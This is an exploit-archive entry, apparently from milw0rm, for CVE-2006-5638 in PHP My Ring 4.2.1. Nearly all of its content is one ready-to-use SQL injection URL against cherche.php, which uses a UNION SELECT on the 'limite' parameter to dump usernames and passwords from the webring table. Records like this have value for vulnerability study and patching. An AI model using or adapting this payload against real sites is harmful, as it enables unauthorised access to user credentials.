PHPMyRing 4.2.1 - 'cherche.php' SQL Injection

Related Vulnerabilities: CVE-2006-5638  
Publish Date: 29 Oct 2006
Author: ajann
                							

            *******************************************************************************
# Title  :  PHP My Ring <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability
# Author :   ajann
*******************************************************************************

###http://[target]/[path]/cherche.php?limite=-1%20union%20select%200,pseudo,0,mdp,0,0%20from%20webring/*&mots=%20&where=description

# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-29]